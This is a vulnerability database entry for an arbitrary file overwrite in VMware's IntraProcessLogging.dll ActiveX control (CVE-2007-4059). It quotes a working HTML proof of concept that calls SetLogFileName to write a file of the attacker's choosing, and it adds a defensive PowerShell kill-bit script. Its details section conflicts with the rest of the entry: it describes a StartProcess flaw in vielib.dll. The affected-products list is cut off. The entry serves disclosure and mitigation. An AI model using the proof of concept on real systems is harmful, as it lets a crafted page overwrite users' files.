VMware IntraProcessLogging.dll ActiveX Control Arbitrary File Overwrite Vulnerability

Vulnerability ID: 1113394 | Vulnerability type: Design error
Published: 2007-07-28 | Updated: 2007-09-20
CVE ID: CVE-2007-4059 | CNNVD ID: CNNVD-200707-559
Platform: Windows | CVSS score: 5.8
|Vulnerability sources
https://www.exploit-db.com/exploits/4240
https://www.securityfocus.com/bid/25110
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200707-559
|Vulnerability details
VMware Workstation is a very popular virtual PC product. The VMware IntraProcessLogging.dll ActiveX control has an implementation flaw that a remote attacker may exploit to execute arbitrary instructions on the user's system. The StartProcess method in the vielib.dll library bundled with VMware does not verify whether it is being called by the application or by a malicious user; if a user is tricked into visiting a malicious web page, the application that calls this library may end up executing arbitrary instructions with the privileges of the logged-in user.
|Vulnerability exploit
<!--
---------------------------------------------------------------------------

:. GOODFELLAS Security Research TEAM  .:
:. http://goodfellas.shellcode.com.ar .:

IntraProcessLogging.dll 5.5.3.42958 VmWare Inc Arbitrary Data Write Exploit
===========================================================================

Internal ID: VULWAR200707280.
-----------

Introduction
------------
IntraProcessLogging.dll is a library shipped with VMware products from
VMware Inc.


Tested In
---------
- Windows XP SP1/SP2 french/english with IE 6.0 / 7.0.


Summary
-------
The SetLogFileName method does not check whether it is being called by the
application or by a malicious user. A remote attacker could craft an HTML
page that overwrites arbitrary files on the system.


Impact
------
Any computer that uses this software is exposed to arbitrary data writes.


Workaround
----------
- Set the kill bit for CLSID AF13B07E-28A1-4CAC-9C9A-EC582E354A24.
- Unregister IntraProcessLogging.dll using regsvr32.


Timeline
--------
July 28 2007 -- Bug Discovery.
July 28 2007 -- Exploit published.


Credits
-------
 * callAX <callAX@shellcode.com.ar>
 * GoodFellas Security Research Team  <goodfellas.shellcode.com.ar>


Technical Details
-----------------

The SetLogFileName method receives a single argument, a filename in the
format "c:\path\file".


Proof of Concept
---------------->

<HTML>
<BODY>
 <object id=ctrl classid="clsid:{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}"></object>

<SCRIPT>

function Do_it()
 {
   File = "c:\\arbitrary_file.txt"
   ctrl.SetLogFileName(File)
 }

</SCRIPT>
<input language=JavaScript onclick=Do_it() type=button value="Proof of Concept">
</BODY>
</HTML>

# milw0rm.com [2007-07-28]
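The advisory's first workaround is the ActiveX kill bit, which makes Internet Explorer refuse to instantiate the control even though the DLL stays registered. The script below is an added example written for this page; it is not part of the GoodFellas advisory or of any VMware tooling. It applies the kill bit to the CLSID the advisory names, covers the Wow6432Node hive that 32-bit IE on 64-bit Windows reads, and then reads the flag back so an administrator can verify the mitigation. The registry path and the 0x400 flag value are Microsoft's documented kill-bit mechanism; the assumption is that it is run from an elevated PowerShell session.

```powershell
# Added example (not from the advisory or VMware): set and verify the ActiveX
# kill bit for the IntraProcessLogging.dll control. Run elevated.
$Clsid   = '{AF13B07E-28A1-4CAC-9C9A-EC582E354A24}'   # CLSID from the advisory
$KillBit = 0x400   # "Compatibility Flags" kill bit: IE will not instantiate the control

# Report whether the control is registered at all (HKCR\CLSID\{...}).
$registered = Test-Path "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
Write-Output "Control $Clsid registered: $registered"

# Native hive always; Wow6432Node only where it exists (64-bit Windows).
$KillBitPaths = @("HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid")
if (Test-Path 'HKLM:\SOFTWARE\Wow6432Node') {
    $KillBitPaths += "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"
}

function Set-ActiveXKillBit {
    param([string]$Path)
    if (-not (Test-Path $Path)) {
        New-Item -Path $Path -Force | Out-Null
    }
    # Preserve any compatibility flags already present; only OR in the kill bit.
    $current = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $current) { $current = 0 }
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value ($current -bor $KillBit) -Type DWord
}

function Test-ActiveXKillBit {
    param([string]$Path)
    # True only if the value exists and the 0x400 bit is set.
    $value = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' -ErrorAction SilentlyContinue).'Compatibility Flags'
    return ($null -ne $value) -and (($value -band $KillBit) -eq $KillBit)
}

foreach ($path in $KillBitPaths) {
    Set-ActiveXKillBit -Path $path
    $state = if (Test-ActiveXKillBit -Path $path) { 'SET' } else { 'NOT SET' }
    Write-Output "$path : kill bit $state"
}

# The advisory's second workaround, unregistering the DLL, is a separate step:
#   regsvr32 /u "<path to VMware install>\IntraProcessLogging.dll"
# (path is a placeholder; locate the DLL under the VMware program directory).
```

Running Test-ActiveXKillBit alone, without the Set call, gives a quick audit check across a fleet: a machine that still reports NOT SET for this CLSID is one where a crafted page can still reach SetLogFileName through IE.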
|Affected products
- VMware Workstation 6.0
- VMware Workstation 5.5.4 build 44386
- VMware Workstation 5.5.4
- VMware Workstation 5.5.3 build 42958
- VMware Workstation 5.5.3 build 34685
- VMware Worksta
|References

Source: BID
Name: 25110
Link: http://www.securityfocus.com/bid/25110
Source: XF
Name: vmware-intraprocesslogging-file-overwrite(35675)
Link: http://xforce.iss.net/xforce/xfdb/35675
Source: www.vmware.com
Link: http://www.vmware.com/support/ws6/doc/releasenotes_ws6.html
Source: www.vmware.com
Link: http://www.vmware.com/support/ws55/doc/releasenotes_ws55.html
Source: www.vmware.com
Link: http://www.vmware.com/support/server/doc/releasenotes_server.html
Source: www.vmware.com
Link: http://www.vmware.com/support/player2/doc/releasenotes_player2.html
Source: www.vmware.com
Link: http://www.vmware.com/support/player/doc/releasenotes_player.html
Source: www.vmware.com
Link: http://www.vmware.com/support/ace/doc/releasenotes_ace.html
Source: MILW0RM
Name: 4240
Link: http://www.milw0rm.com/exploits/4240
Source: VUPEN
Name: ADV-2007-3229
Link: http://www.frsirt.com/english/advisories/2007/3229
Source: SECUNIA
Name: 26890
Link: http://secunia.com/advisories/26890
Source: FULLDISC
Name: 20070920 VMSA-2007-0006 Critical security updates for all supported versions of VMware ESX Server, VMware Server, VMware Workstation, VM